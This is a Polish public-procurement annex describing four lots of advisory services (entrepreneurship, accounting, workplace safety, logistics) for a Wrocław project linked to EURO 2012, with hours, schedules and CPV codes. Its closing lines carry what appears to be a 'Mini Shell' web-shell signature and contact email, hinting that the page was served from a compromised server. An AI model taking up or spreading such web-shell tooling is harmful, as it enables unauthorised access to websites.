<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Doradztwo z zakresu przedsiębiorczości związanej z EURO 2012.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Doradztwo grupowe - doradztwo realizowane w grupach - służące pogłębieniu wiedzy z zakresu tematyki poruszanej podczas szkoleń; doradztwo zostanie dopasowane do indywidualnych potrzeb uczestników, w tym np.: w jaki sposób należy przygotowywać wybrane części biznesplanu, jak tworzyć prognozy rachunku zysków i strat (4h/edycję szkolenia (1h=60 minut).
2.	Doradztwo indywidualne - jego celem jest rozwiązywanie indywidualnych problemów przy tworzeniu biznesplanu związanych z planowaną przez uczestników działalnością (średnio 45min na 1 uczestnika)

RAMOWY ZAKRES DORADZTWA
wpływ przygotowań i organizacji EURO 2012 na gospodarkę Dolnego Śląska i Polski,
tworzenie biznesplanu zawierającego plan marketingowy i plan inwestycyjny,
tworzenie harmonogramu rzeczowo - finansowego przedsięwzięcia.

Tematyka doradztwa będzie uzależniona od zapotrzebowania zgłaszanego przez uczestników projektu.
3.	Doradcze wsparcie pomostowe podstawowe -  doradztwo indywidualne z zakresu przedsiębiorczości stanowiące pomoc w efektywnym wykorzystaniu środków finansowych na rozwój przedsiębiorczości oraz prowadzeniem firmy (średnio po 45min/m-c/uczestnika dla max 60 uczestników),
4.	Doradcze wsparcie pomostowe  rozszerzone - Doradztwo indywidualne z zakresu przedsiębiorczości stanowiące pomoc w efektywnym wykorzystaniu środków finansowych na rozwój przedsiębiorczości oraz prowadzeniem firmy (średnio po 45min/m-c/uczestnika dla max 60 uczestników).

Tematyka doradztwa będzie uzależniona od zapotrzebowania zgłaszanego przez uczestników projektu.
Wymagana ilość godzin:
Cześć I:
1.	Doradztwo grupowe:
4	godziny/ edycję x 3 edycje = 12 godzin (godzina = 60 minut)
2.	Doradztwo indywidualne
15 godzin/ edycję x 3 edycje = 45 godzin (godzina = 60 minut)
3.	Doradztwo pomostowe podstawowe
od 10 godzin do 270 godzin (godzina = 60 minut)
4.	Doradztwo pomostowe rozszerzone 
od 10 godzin do 270 godzin (godzina = 60 minut)
Cześć I: 
Doradztwo grupowe, Doradztwo indywidualne w dni powszednie
i weekendy w godzinach 8,00-16,00	VI-VII 2011, X-XI 2011, II-III 2012
Doradztwo pomostowe podstawowe		IX 2011-X 2012
Doradztwo pomostowe rozszerzone		III 2012 - IV 2013
Miejsce realizacji przedmiotu zamówienia: 	
Miejscem odbywania - realizacji przedmiotu zamówienia jest siedziba Zamawiającego,                        Ul. Strzegomska 49, 53-611 Wrocław,

Dokumentacja:
Zamawiający wymaga prowadzenia przez Wykonawcę dokumentacji przekazanej przez Zamawiającego, w tym karty doradztwa, dzienników, sprawozdań z udzielonego doradztwa..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.14.00.00-7, 79.22.10.00-9, 79.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi doradcze z zakresu księgowości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	 Doradztwo grupowe - doradztwo realizowane w grupach - służące pogłębieniu wiedzy z zakresu tematyki poruszanej podczas szkoleń; doradztwo zostanie dopasowane do indywidualnych potrzeb uczestników, w tym np.: w jaki sposób należy przygotowywać wybrane części biznesplanu, jak tworzyć prognozy rachunku zysków i strat (4h/edycję szkolenia (1h=60 minut).
2.	Doradztwo indywidualne - jego celem jest rozwiązywanie indywidualnych problemów przy tworzeniu biznesplanu związanych z planowaną przez uczestników działalnością (średnio 45min na 1 uczestnika).

RAMOWY ZAKRES DORADZTWA
formy opodatkowania działalności gospodarczej,
Podatkowa Księga Przychodów i Rozchodów,
podsumowanie miesięczne i roczne zamknięcie KPiR,
dowody księgowe,
aktywa i pasywa,
podatek od towarów i usług,
podatek dochodowy od osób fizycznych,
rozliczanie z US i ZUS,
zagadnienia związane z przygotowaniem biznesplanu.

Tematyka doradztwa będzie uzależniona od zapotrzebowania zgłaszanego przez uczestników projektu.
3.	Doradcze wsparcie pomostowe podstawowe -  doradztwo indywidualne z zakresu księgowości stanowiące pomoc w efektywnym wykorzystaniu środków finansowych na rozwój przedsiębiorczości oraz prowadzeniem firmy (średnio po 1,5h/m-c/uczestnika dla max 60 uczestników)
4.	Doradcze wsparcie pomostowe  rozszerzone - doradztwo indywidualne z zakresu księgowości stanowiące pomoc w efektywnym wykorzystaniu środków finansowych na rozwój przedsiębiorczości oraz prowadzeniem firmy (średnio po 45min/m-c/uczestnika dla max 60 uczestników)

Tematyka doradztwa będzie uzależniona od zapotrzebowania zgłaszanego przez uczestników projektu.

wymagana ilość godzin
1.	Doradztwo grupowe:
4	godziny/ edycję x 3 edycje = 12 godzin (godzina = 60 minut)
2.	Doradztwo indywidualne
15 godzin/ edycję x 3 edycje = 45 godzin (godzina = 60 minut)
3.	Doradztwo pomostowe podstawowe
od 10 godzin do 540 godzin (godzina = 60 minut)
4.	Doradztwo pomostowe rozszerzone 
od 10 godzin do 540 godzin (godzina = 60 minut)

Doradztwo grupowe, Doradztwo indywidualne	
w dni powszednie i weekendy w godzinach 8,00-16,00	VI-VII 2011, X-XI 2011, II-III 2012

Miejsce realizacji przedmiotu zamówienia: 	
Miejscem odbywania - realizacji przedmiotu zamówienia jest siedziba Zamawiającego,                        Ul. Strzegomska 49, 53-611 Wrocław,

Dokumentacja:
Zamawiający wymaga prowadzenia przez Wykonawcę dokumentacji przekazanej przez Zamawiającego, w tym karty doradztwa, dzienników, sprawozdań z udzielonego doradztwa.

		
Doradztwo pomostowe podstawowe		IX 2011-X 2012
Doradztwo pomostowe rozszerzone		III 2012 - IV 2013.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.14.00.00-7, 79.22.10.00-9, 79.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Doradztwo z zakresu BHP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Doradztwo indywidualne - jego celem jest rozwiązywanie indywidualnych problemów przy tworzeniu biznesplanu związanych z planowaną przez uczestników działalnością (średnio 45min na 1 uczestnika)

RAMOWY ZAKRES DORADZTWA
regulacje prawne z zakresu prawa pracy dotyczące bezpieczeństwa i higieny pracy,
organizacja i metody kształtowania bezpiecznych i higienicznych warunków pracy,
ocena zagrożeń w pracy i metody ochrony przed zagrożeniami,
zasady postępowania w razie wypadku w czasie pracy i sytuacjach zagrożeń,
obowiązki i odpowiedzialność pracodawców oraz prawa i obowiązki pracowników wynikające z BHP,
pojęcie zrównoważonego rozwoju i korzyści z niego płynące.

Tematyka doradztwa będzie uzależniona od zapotrzebowania zgłaszanego przez uczestników projektu.
2.	Doradcze wsparcie pomostowe podstawowe -  doradztwo indywidualne z zakresu BHP stanowiące pomoc w efektywnym wykorzystaniu środków finansowych na rozwój przedsiębiorczości oraz prowadzeniem firmy (średnio po 45min/m-c/uczestnika)
3.	Doradcze wsparcie pomostowe  rozszerzone -  doradztwo indywidualne z zakresu BHP stanowiące pomoc w efektywnym wykorzystaniu środków finansowych na rozwój przedsiębiorczości oraz prowadzeniem firmy (średnio po 45min/m-c/uczestnika)

Tematyka doradztwa będzie uzależniona od zapotrzebowania zgłaszanego przez uczestników projektu.


Cześć III:
Doradztwo z zakresu BHP
1.	Doradztwo indywidualne
15 godzin/ edycję x 3 edycje = 45 godzin (godzina = 60 minut)
2.	Doradztwo pomostowe podstawowe
od 10 godzin do 270 godzin (godzina = 60 minut)
3.	Doradztwo pomostowe rozszerzone 
od 10 godzin do 270 godzin (godzina = 60 minut)

Doradztwo indywidualne	
w dni powszednie i weekendy w godzinach 8,00-16,00	VI-VII 2011, X-XI 2011, II-III 2012
Doradztwo pomostowe podstawowe		IX 2011-X 2012
Doradztwo pomostowe rozszerzone		III 2012 - IV 2013

Miejsce realizacji przedmiotu zamówienia: 	
Miejscem odbywania - realizacji przedmiotu zamówienia jest siedziba Zamawiającego,                        Ul. Strzegomska 49, 53-611 Wrocław,
Dokumentacja:
Zamawiający wymaga prowadzenia przez Wykonawcę dokumentacji przekazanej przez Zamawiającego, w tym karty doradztwa, dzienników, sprawozdań z udzielonego doradztwa..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.14.00.00-7, 79.22.10.00-9, 79.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Doradztwo z zakresu logistyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Doradztwo grupowe - doradztwo realizowane w grupach - służące pogłębieniu wiedzy z zakresu tematyki poruszanej podczas szkoleń; doradztwo zostanie dopasowane do indywidualnych potrzeb uczestników.

RAMOWY ZAKRES DORADZTWA
logistyka - jej rola w firmie,
planowanie działań,
zarządzanie łańcuchem dostaw,
standaryzacja i dokumentowanie działań,
organizacja procesów zakupowych i zaopatrzeniowych,
zarządzanie zapasami i przepływami materiałowymi,
rachunek kosztów w logistyce,
problemy z wdrażaniem logistyki do MSP.

Tematyka doradztwa będzie uzależniona od zapotrzebowania zgłaszanego przez uczestników projektu.
2.	Doradcze wsparcie pomostowe podstawowe -  doradztwo indywidualne z zakresu logistyki stanowiące pomoc w efektywnym wykorzystaniu środków finansowych na rozwój przedsiębiorczości oraz prowadzeniem firmy (średnio po 45min/m-c/uczestnika dla max 60 uczestników)
3.	Doradcze wsparcie pomostowe  rozszerzone -  doradztwo indywidualne z zakresu logistyki stanowiące pomoc w efektywnym wykorzystaniu środków finansowych na rozwój przedsiębiorczości oraz prowadzeniem firmy (średnio po 45min/m-c/uczestnika dla max 60 uczestników)

Tematyka doradztwa będzie uzależniona od zapotrzebowania zgłaszanego przez uczestników projektu.
Cześć IV:
Doradztwo z zakresu logistyki
1.	Doradztwo grupowe
4 godziny/ edycję x 3 edycje = 12 godzin (godzina = 60 minut)
2.	Doradztwo pomostowe podstawowe
od 10 godzin do 270 godzin (godzina = 60 minut)
3.	Doradztwo pomostowe rozszerzone 
od 10 godzin do 270 godzin (godzina = 60 minut)

Doradztwo grupowe	
w dni powszednie i weekendy w godzinach 8,00-16,00	VI-VII 2011, X-XI 2011, II-III 2012
Doradztwo pomostowe podstawowe		IX 2011-X 2012
Doradztwo pomostowe rozszerzone		III 2012 - IV 2013

Miejsce realizacji przedmiotu zamówienia: 	
Miejscem odbywania - realizacji przedmiotu zamówienia jest siedziba Zamawiającego,                        Ul. Strzegomska 49, 53-611 Wrocław,

Dokumentacja:
Zamawiający wymaga prowadzenia przez Wykonawcę dokumentacji przekazanej przez Zamawiającego, w tym karty doradztwa, dzienników, sprawozdań z udzielonego doradztwa..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.14.00.00-7, 79.22.10.00-9, 79.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com